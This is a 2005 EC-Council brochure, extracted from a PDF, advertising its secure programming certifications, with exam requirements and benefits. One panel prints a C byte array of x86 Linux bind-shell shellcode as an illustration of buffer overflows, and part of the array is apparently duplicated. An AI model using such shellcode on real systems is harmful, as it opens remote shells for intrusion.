Certified Secure Programmer - EC-Council

Certified Secure ProgrammerStop the Buffer Overflows.Stop the Hackers.Start Writing Secure Code.TME C S PEC-CouncilCertified Secure Programmerhttp://www.eccouncil.orgEC-Council

Problem StatementCertified Secure ProgrammerAbout 95% of software bugs come from common, well-understood programmingmistakes. Today's developers ... oftentimes don't have the academic discipline ofsecure software engineering and secure software development and training aroundwhat characteristics would create flaws in the program or lead to bugs.One of the problems is that the educational establishment generally doesn't teachsecure programming at the undergradute, or even graduate level.http://www.eccouncil.orgEC-Council

char remote[] ="\xeb\x0a""1234567890" /* buffer overflow code */"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6""\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50""\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a""\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31""\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0""\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80""\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62""\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6""\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50""\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a""\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31""\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0""\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80""\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62""\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6""\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50""\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a""\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31""\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0""\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80""\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62""\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\xa1\x5f\x66\x6e\x69";......Buffer OverflowsVulnerability in applications are attributed to poor programming, lack of input validation and lack ofstructured software engineering process. Buffer overflows make up one of the largest collections ofvulnerabilities in existence; And a large percentage of possible remote exploits are of the overflow variety.If executed properly, an overflow vulnerability will allow an attacker to run arbitrary code on the victim'smachine with the equivalent rights of whichever process was overflowed. This is often used to provide aremote shell onto the victim machine, which can be used for further exploitation.A buffer overflows in application can be avoided by writing secure software code.http://www.eccouncil.orgEC-Council

Certified Secure ProgrammerEC-Council’s Certified Secure Programmerand Certified SecureApplication Developer are beingoffered to provide the essential andfundamental skills to programmersand application developers insecure programming. The mostprevalent reason behind buggy codeand vulnerabilities being exploitedby hackers and malicious code is thelack of adoption of secure codingpractices.The Certified Secure Programmerand Certified Secure ApplicationDeveloper programs will ensurethat programmers and developersare exposed to the inherent securitydrawbacks in various programminglanguages or architectures. Theywill be further trained to exercisesecure programming practices toovercome these inherent drawbacksin order to pre-empt bugs from thecode.http://www.eccouncil.orgEC-Council

ECSP / CSADCertified Secure Programmer laysthe basic foundation required by allapplication developers and developmentorganizations to produceapplications with greater stabilityand posing lesser security risks tothe consumer. The Certified SecureApplication Developer standardizesthe knowledge base for applicationdevelopment by incorporating thebest practices followed by experiencedexperts in the variousdomains.The distinguishing aspect of ECSPand CSAD is that unlike vendor ordomain specific certifications, itexposes the aspirant to variousprogramming languages from asecurity perspective. This drivesgreater appreciation for the platform/ architecture / language onespecializes on as well as an overviewon related ones.EC-Council Certified Secure Programmer (ECSP)andCertified Secure Application Developer (CSAD)http://www.eccouncil.orgEC-Council

Requirements1. To achieve EC-Council CertifiedSecure Programmer (E|CSP), passEC-Council’s Certified Secure Programmer312-92 exam.2. To achieve EC-Council CertifiedSecure Application Developer(C|SAD), achieve an applicationdevelopment certification from anyof the following vendors and passEC-Council’s Certified Secure Programmer312-92 exam.For Linux: LCE / LCA / RHCE /LPI certificationFor Microsoft: MCAD / MCSDcertificationFor Sun: SCJD / SCEA certificationFor Oracle: OCP certification (DBA)For IBM: Websphere certificationhttp://www.eccouncil.orgEC-Council

Benefits1. Exposure to a wide range ofprogramming languages and trainon well endorsed secure codingpractices2. Improve your employability indevelopment organizations3. Exposure to application developmentacross platforms4. Enhance skills on writing bettercode and improve efficiency5. Build secure applicationsTarget AudienceThe ECSP certification is intendedfor programmers who are responsiblefor designing and buildingsecure Windows/Web based applicationswith .NET/Java Framework.It is designed for developers whohave C#, C++ and Java developmentskills.http://www.eccouncil.orgEC-Council

Certified Secure Application DeveloperCertificationStartStep 1Achieve ECSPCertificationStep 2Achieve any one of thefollowing vendorspecific certifications:For Linux:LCE / LCA / RHCE / LPI certificationFor Microsoft:MCAD / MCSD certificationFor Sun:SCJD / SCEA certificationFor Oracle:OCP certification ( DBA)For IBM:WebSphere certificationCSAD AchievedTMC S A DCertifiedSecure Application Developerhttp://www.eccouncil.orgEC-Council

International Council of E-Commerce Consultants67 Wall Street, 22nd FloorNew York, NY 10005-3198USAPhone: 212.380.1571Fax: 212.202.3500Copyright 2005 EC-Council. All Rights Reserved.http://www.eccouncil.orgEC-Council